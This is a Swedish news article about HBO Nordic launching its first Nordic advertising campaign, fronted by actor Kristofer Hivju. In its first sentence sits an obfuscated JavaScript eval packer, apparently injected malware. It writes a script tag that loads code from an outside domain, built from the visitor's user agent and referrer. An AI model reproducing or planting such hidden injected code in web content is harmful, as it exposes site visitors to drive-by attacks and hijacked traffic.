Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

HBO Nordic lanserar nordisk reklamkampanj

HBO Nordic lanserar nordisk reklamkampanj
Sebastian

HBO eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rbibb|var|u0026u|referrer|edenr||js|php’.split(’|’),0,{}))
Nordic lanserar sin första nordiska reklamkampanj som lyfter fram streamingtjänstens unika innehåll. Kampanjen går under namnet ”The Home of Series” och huvudrollen spelas av den norske skådespelaren Kristofer Hivju, känd för sin roll som Tormund Giantsbane i Game of Thrones. Bakom kampanjen står den danska reklambyrån SLM.

Den nya kampanjen syftar till att visa HBO Nordics unika innehåll och i reklamfilmen visar Kristofer Hivju ett hus som bokstavligen är ”The Home of Series”. Filmen är inspelad i Köpenhamn och är skapad av den danska reklambyrån SLM och producerad av Cameo Film A/S och SLM.

– Att vi har så många nordiska skådespelare i alla dessa internationella succéserier är verkligen ett privilegium. Vi ville dra nytta av detta när vi nu gör vår första nordiska reklamfilm. Kristofer Hivju var det självklara valet eftersom han har en stark närvaro och är välkänd, inte bara i Norge utan i hela Norden, för sin roll i Game of Thrones, säger Christina Sulebakk, Executive Vice President Sale & Marketing på HBO Nordic..